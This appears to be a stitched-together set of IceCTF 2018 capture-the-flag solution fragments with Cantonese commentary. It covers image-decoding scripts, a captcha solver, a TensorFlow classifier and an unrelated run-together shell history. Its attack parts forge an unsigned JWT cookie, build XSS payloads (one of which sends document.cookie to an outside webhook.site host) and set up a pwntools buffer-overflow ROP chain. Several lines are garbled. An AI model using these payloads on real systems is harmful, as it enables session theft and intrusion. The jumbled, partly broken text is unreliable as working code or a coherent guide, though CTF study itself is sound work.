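# Re-draw every black pixel of solved.bmp as a 5x5 black square on a white
# 1000x1000 canvas and save the result as flag2.png.
# Image / ImageDraw come from Pillow and are imported elsewhere in the file.
flagImage = Image.new('RGB', (1000, 1000), "white")
with Image.open('solved.bmp') as src:
    im = src.convert('RGB')

# One Draw object serves the whole loop; the original created a fresh one
# for every black pixel it found.
dr = ImageDraw.Draw(flagImage)

# Scan the first 350 columns x 229 rows of the source image.  Scaled by 5 the
# scanned region would be 1750x1145, so squares past the 1000-px canvas edge
# are clipped by Pillow — presumably the flag lies inside; confirm if the
# output looks cut off.
for x in range(350):
    for y in range(229):
        if im.getpixel((x, y)) == (0, 0, 0):
            dr.rectangle(((x, y), (x + 5, y + 5)), fill="black", outline="black")

flagImage.save("flag2.png")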
git exit cd root pwd ls ls -la exit cat /etc/hostname exit cat /etc/hostname exit cat /eyc/hostname cat /etc/hostname echo Centos >> /etc/hostname bash echo Centos > /etc/hostname bash exit cd ~/.i3 cd ~ ls pwd cd .. ls cd .i3 pwd ls -a cd ~/.i3 cd ls ls -a pwd cd .. ls ls -a cd .. ls ls -a cd etc ls ls -a cd i3 ls cd ls ls -a mkdir .i3 ls ls -a ls ls -a cd Documents/ ls mv config ~/.i3 ls cd .. ls ls -a cd .i3 ls cd cd documents cd Documents/ ls cd ls cd .i3 ls sudo subl config cd ls cd Pictures/ ls pwd cd .. ls ls 0a ls -a cd bin ls cd ls cd ls ls -a cd .bashrc sudo subl .bashrc sudo subl .bash_aliases ls brightness ls sudo echo 200 > brightness sudo su cd cd Downloads wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp cd ls sudo subl .bash_aliases backlight brightrness brightness ls cd command-list alias-list alias-list alias-list sudo subl .bashrc sudo subl .bash_aliases i3-config alias-list brightness i3-config alias-list sudo subl .bashrc alias-list sudo subl .bashrc alias-list bash_aliases . ~/.bash_aliases sudo subl .bash_welcome sudo subl .bash_todo alias-list todo to-do edit-todo to-do cd alias-list edit-todo cd Downloads ls -a mv eRkjLlksZp tool.py cat .bash_aliases sudo subl .bash_aliases alias-list cat .bash_aliases ls -a sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386 javac -version sudo apt update apt list --upgradable javac -version sudo apt install oracle-java8-installer javac -version sudo apt install oracle-java8-set-default ls cd bin ls ./studio.sh ls cd android cd Android/ ls cd .. ls cd .. cd ./studio.sh cd .. ls cd .. ls cd /mnt ls cd cd Downloads ./tool.py ../secret > ../hzpxbsklqvboyou ls -a cd .. ls cd usr/ ls cd bin ls ls .. ls cd .. ls cd locals cdlocal ls cd android-studio/ ls cd shred secret ls ls -a sudo subl .bash_aliases android-studio ls ls Documents/ ls cd Documents/ ls cd .. 
cd Downloads/ rm tool.py ls ls cd ls git sudo apt install git git config --global user.name "skuli" git config --global user.email "sheep.man@fake.com" ls -a cat .gitconfig cd Documents/ ls mkdir projects ls cd projects pwd cd .. cd Downloads/ cd java/ ls cd jre1.8.0_171/ ls cd bin/ ls cd .. cd jre1.8.0_171/ ls cat README cd .. ls cd .. ls cdlocal/ ls cd bin/ ls ls cd 3840x2160/ ls cd .. cd . cd .. ls -al cd .local/ ls cd share/ ls ls cd Write/ ls sudo chmod +x INSTALL ls sudo ./INSTALL sudo chmod -x INSTALL cat INSTALL ls ./Write ls cd .. ls sudo rm write209.tar.gz sudo rm -R Write/ ls cd .. ls ls ls -al grep / "howdy" 2> /dev/null cd .. grep -r "howdy" 2> /dev/null ls /lib/security/ cd /lib/security/ ls ls -al tree cd howdy/ ls ./cli ./cli.py ls exit
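def encode(filename):
    """Read the first line of ``filename`` and return its scrambled token.

    Steps, identical to the original: strip the first line, shift each
    character's code point by the matching entry of a repeating 14-entry
    offset table, base64-encode the UTF-8 bytes, reverse the base64 text and
    repeat it five times.

    The original indexed a fixed ``[...] * 3`` table, so any line longer than
    42 characters raised IndexError; the offsets now cycle for any length
    (identical results for lines of 42 characters or fewer).

    Args:
        filename: path of a text file whose first line is encoded.

    Returns:
        str: the reversed base64 text repeated five times.

    Raises:
        OSError: if the file cannot be opened.
        ValueError: if a shifted code point falls below 0 (``chr`` rejects it).
    """
    offsets = [5, -1, 3, -3, 2, 15, -6, 3, 9, 1, -3, -5, 3, -15]
    with open(filename, "r") as f:
        line = f.readline().strip()
    shifted = ''.join(
        chr(ord(ch) + offsets[i % len(offsets)]) for i, ch in enumerate(line)
    )
    b64 = base64.b64encode(shifted.encode('utf-8')).decode('utf-8')
    return b64[::-1] * 5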
if __name__ == "__main__":
    # CLI entry point: the file to encode is the first positional argument.
    source_path = sys.argv[1]
    print(encode(source_path))
import requests from bs4 import BeautifulSoup from math import sqrt; from itertools import count, islice import gmpy2
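def solveQuestion(s):
    """Answer one anti-captcha question given as plain text.

    Returns a str for the text questions, the gmpy2 gcd result for the gcd
    question, and None for an unrecognised question (after printing it so the
    missing pattern can be added).  The caller wraps the result in ``str()``.
    ``gmpy2`` is imported at file level.  ``print(s)`` replaces ``print s`` so
    the function parses under both Python 2 and 3.
    """
    if "word in the following line" in s:
        # e.g. "What is the 3rd word in the following line: a b c":
        # token 3 is the ordinal, the candidate words follow ": ".
        # NOTE(review): the third replace looks like a no-op as shown; its
        # first argument was probably a non-breaking space lost in copy — confirm.
        s = s.replace("\n", " ").replace(".", " ").replace(" ", " ")
        ordinal = s.split(" ")[3]
        for suffix in ("th", "st", "nd", "rd"):
            ordinal = ordinal.replace(suffix, "")
        num = int(ordinal)
        return s.split(": ")[1].split(" ")[num - 1]
    if "a prime number" in s:
        num = int(s.split(" ")[1])
        return str(gmpy2.is_prime(num)).lower()
    if "What is the greatest common divisor" in s:
        num1 = int(s.split(" ")[7])
        num2 = int(s.split(" ")[9].replace("?", ""))
        return gmpy2.gcd(num1, num2)
    # Fixed-answer questions, checked in the original order.
    fixed_answers = [
        ("Which planet is closest to the sun", "Mercury"),
        ("What is the capital of Germany", "Berlin"),
        ("How many planets are between Earth and the Sun?", "2"),
        ("How many strings does a violin have?", "4"),
        ("What is the tallest mountain on Earth?", "Mount Everest"),
        ("What year is it?", "2018"),
        ("What color is the sky?", "Blue"),
        ("Who directed the movie Jaws?", "Steven Spielberg"),
        ("What is the capital of Hawaii?", "Honolulu"),
    ]
    for needle, answer in fixed_answers:
        if needle in s:
            return answer
    # Unknown question: show it so a new branch can be written; returns None.
    print(s)
    return None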
# Fetch the challenge page and answer every question cell.  Questions sit in
# every other <td> (even indices); the odd cells are skipped.
s = requests.Session()
content = s.get("https://43xa7xhkaj0cd8c-anticaptcha.labs.icec.tf/").text
soup = BeautifulSoup(content, 'html.parser')
td_tags = soup.find_all("td")
answer = [str(solveQuestion(cell.string)) for cell in td_tags[::2]]
// Re-centres the map on the current position, redraws the user marker and
// asks the server for nearby "mangos".  `map`, `currentPos`, `mangos` and
// `uuid` are not declared in this excerpt; presumably globals set by the
// surrounding page script — confirm.  The $.post callback and the function
// itself are closed beyond this excerpt.
var updateMap = function() {
  console.log("updating map");
  map.setCenter(currentPos);
  // Clear mangos: detach every existing marker from the map, then drop the list.
  for (var i = 0; i < mangos.length; i++) { mangos[i].setMap(null); }
  mangos = [];
  var user = new google.maps.Marker({ position: currentPos, map: map, icon: 'img/user_marker.png' });
  // You're my favorite mango
  mangos.push(user);
  var payload = { lat: currentPos.lat, long: currentPos.lng }
  payload["uuid"] = uuid
  // NOTE(review): the request is sent over plain http, so the uuid and the
  // position travel unencrypted, and the response is used without validation.
  $.post("http://pokeamango.vuln.icec.tf/mango/list", payload, function(results){
    var data = results["mangos"];
    for (var i = 0; i < data.length; i++) {
      var place = data[i];
      var mango = new google.maps.Marker({ position: place, map: map, icon: 'img/mangie_marker.png' });
⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[[[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]]]⌝⌝⌝⌝]] ⌟ [[[⌝⌝⌝⌝⌟⌝⌝⌝⌝]]]⌞⌞⌞⌝⌝⌝⨆]⌞⌞ THE mag icwordsares queamish os sifrage The magic words are squeamish ossifrage
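import binascii

# Reassemble the hidden file: each of the 110 16x16 frames contributes its
# pixels' RGB bytes, in scan order, as consecutive bytes of the output.
hex_chunks = []
for i in range(110):
    frame_name = 'frame_' + str(i).zfill(3) + '_delay-0.1s.gif'
    with Image.open(frame_name) as frame:
        im = frame.convert('RGB')
    for x in range(16):
        for y in range(16):
            # (y, x) order kept from the original — presumably what the
            # puzzle expects; confirm if the output looks transposed.
            r, g, b = im.getpixel((y, x))
            hex_chunks.append('{:02x}{:02x}{:02x}'.format(r, g, b))
# Collect pieces in a list and join once instead of growing a str per pixel.
c = ''.join(hex_chunks)
with open("ilovebees", "wb") as f:
    # unhexlify works on Python 2 and 3 (str.decode('hex') is 2-only);
    # the with-block closes the file, so the original's explicit close() is gone.
    f.write(binascii.unhexlify(c))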
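# Quiet TensorFlow's C++ logging ('2' = warnings and errors only).
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Numerically named JPEGs under ./hotornot, sorted by their number.  The
# original listed the directory twice; the first listing was overwritten
# unused.  A non-numeric stem still raises ValueError in the sort key.
files = [name for name in os.listdir('./hotornot') if name.endswith('.jpg')]
files.sort(key=lambda x: int(x[:-4]))
index = 1  # change this as you see fit
image_path = sys.argv[1]
# Read in the image_data; the with-block closes the handle the original left open.
with tf.gfile.FastGFile(image_path, 'rb') as image_file:
    image_data = image_file.read()
# Loads label file, strips off carriage return
with tf.gfile.GFile("/tf_files/retrained_labels.txt") as label_file:
    label_lines = [line.rstrip() for line in label_file]
# Unpersists graph from file
with tf.gfile.FastGFile("/tf_files/retrained_graph.pb", 'rb') as f:
    graph_def = tf.GraphDef()
    graph_def.ParseFromString(f.read())
    tf.import_graph_def(graph_def, name='')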
with tf.Session() as sess: # Feed the image_data as input to the graph and get first prediction softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')
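import subprocess

# Run the classifier once per numbered JPEG in ./hotornot, concatenate the
# one-line outputs into result.txt and print progress as it goes.
# (The original listed the directory twice; the first listing was unused.)
files = [name for name in os.listdir('./hotornot') if name.endswith('.jpg')]
files.sort(key=lambda x: int(x[:-4]))
print(files)
chunks = []
index = 1
for f in files:
    # Argument list instead of a shell command string: the file name is never
    # parsed by a shell, so a name containing spaces or shell metacharacters
    # cannot alter the command.  Popen + communicate keeps the original
    # os.popen behaviour of ignoring the child's exit status.
    proc = subprocess.Popen(["python", "label_hotnot.py", "./hotornot/" + f],
                            stdout=subprocess.PIPE)
    output = proc.communicate()[0]
    chunks.append(output.replace(b"\n", b""))
    print("Status: " + str(index) + " / " + str(len(files)))
    index += 1
# Bytes throughout so the 'wb' write works on Python 2 and 3 alike.
result = b"".join(chunks)
with open("result.txt", "wb") as out_file:
    # The with-block closes the file; no explicit close() needed.
    out_file.write(result)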
#token base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=') #{"typ":"JWT","alg":"none"} base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==') #{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}
import base64 base64.b64encode('{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9
改完之後發現右上角個username係無變過既 , 留個言試下先啦咁唯有
竟然都係無變過!!! cookies save得唔會冇用掛 , 盡下人事禁埋入去 comment 到睇
竟然變左!! , 咁開始試下構造D xss payload玩弄下個website啦
improt base64 base64.b64encode('{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=
但是原來有做 filtering
試下試下發現佢好似扑左都幾多野。結果最後試左呢抽野出黎係work既
import base64 base64.b64encode('{"username":"<img src=x onerror=\'javascript:alert('XSS')\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9
import base64 base64.b64encode('{"username":"<img src=x onerror=\'function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #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
<div class="ribbon pink"></div> <div class="container"> <div class="flag center blue white-text"> IceCTF{who_trusts_these_cookies_anyway?} </div> <div class="row post"> <div class="col s12"> <div class="card"> <div class="card-image"> <img src="/static/img/icectfteam.jpg"> <span class="card-title">The First Compiler</span> </div> <a class="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger" href="#comment-modal" data-id="1"><i class="material-icons">comment</i></a>
<div class="card-content"> <h5>IceCTF Worked on The First Compiler</h5> <p>It's not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p> <p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p> <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p> </div> </div> </div> </div> </div>
<div class="ribbon cyan"></div> <div class="container"> <div class="row"> <div class="col s12"> <div class="card"> <div class="card-image"> <img src="/static/img/eniac.jpg"> <span class="card-title">The ENIAC!</span> </div> <a class="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger" href="#comment-modal" data-id="2"><i class="material-icons">comment</i></a> <div class="card-content"> <h5>The IceCTF Team Created The ENIAC!</h5> <p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p> <p>There's no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p> <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p> </div> </div> </div> </div> </div>
<footer class="page-footer grey darken-3"> <div class="container"> <div class="row"> <div class="col l6 s12"> <h5 class="white-text">About Me</h5> <p class="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p> </div> </div> </div> <div class="footer-copyright"> <div class="container"> Made with <a class="brown-text text-lighten-3" href="http://materializecss.com">Materialize</a> </div> </div> </footer>
puts("Sanity Check should be easy"); fflush(_bss_start); gets(&v4); return0; }
Leak Function Address
首先試下點樣可以 trigger main行多次先
from pwn import *
p = process('sanity') e = ELF('./sanity')
payload = "a"*(0x70+8) payload += p64(gadget) payload += p64(0x401000) #just for fill rdi payload += p64(e.symbols['main']) """ Output: Sanity Check should be easy Sanity Check should be easy """